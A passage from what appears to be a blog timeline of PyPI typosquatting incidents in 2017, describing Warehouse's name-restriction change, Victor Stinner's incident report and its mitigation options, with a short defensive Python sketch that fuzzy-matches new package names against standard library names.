On the 18th of September 2017, Pull Request #2409 is merged into Warehouse, the “backoffice” of PyPI. It adds a routine that fuzzy matches new package names against a list of Python standard library names and restricts their registration if there is a match. Issue #2151, opened in reaction to Steve's post on Hackernoon, is closed.
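Fuzzy matching of this kind can be sketched with Python's standard `difflib` module. This is a minimal sketch, not the code from PR #2409: `STDLIB_NAMES` is a tiny hand-picked sample (Python 3.10+ exposes the full list of the running interpreter as `sys.stdlib_module_names`), and the 0.8 similarity cutoff is an arbitrary assumption:

```python
import difflib

# Small illustrative sample; some names (like urllib2) only exist in older Pythons.
STDLIB_NAMES = [
    "json", "os", "urllib", "urllib2", "xml", "bz2",
    "crypt", "pwd", "telnetlib", "tkinter", "smtplib",
]


def is_restricted(name: str, cutoff: float = 0.8) -> bool:
    """True if `name` is identical or very similar to a standard library name."""
    matches = difflib.get_close_matches(name.lower(), STDLIB_NAMES, n=1, cutoff=cutoff)
    return bool(matches)


if __name__ == "__main__":
    for candidate in ("json", "urlib", "XML", "requests", "flask"):
        print(candidate, is_restricted(candidate))
```

A higher cutoff blocks fewer legitimate names but lets more typosquats through; the right threshold is a policy decision rather than something this sketch settles.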

September 22nd 2017: The PyPI Response Report

On September 22nd, Python core developer Victor Stinner publishes an in-depth incident report on the Python security announcements mailing list, addressing the advisory by the SKCSIRT and the issue of typosquatting on PyPI in general. This mailing list was created as a result of the advisory.

Victor's report adds one package, xml (impersonating a standard library module), to the list of packages that were part of this attack. Additionally, it covers the recent history of typosquatting on PyPI, from Nikolai's thesis in March 2016, through the fate0 incident, to the pytosquatting project.

It also links to the new “PyPI typo squatting” section on the python-security website.

The report then discusses a number of mitigation techniques along with their advantages and disadvantages, such as third-party component review, client-side typo detection and notification, blocking registration of certain package names, and server-side notifications about similar project names (to be reviewed by PyPI admins), which is the solution that was chosen.

EOY 2017

I’m now about halfway through the list of package dependency compromise events that I compiled and decided to release this first part of the timeline. If you see an event missing, please let me know, and thanks for reading this far.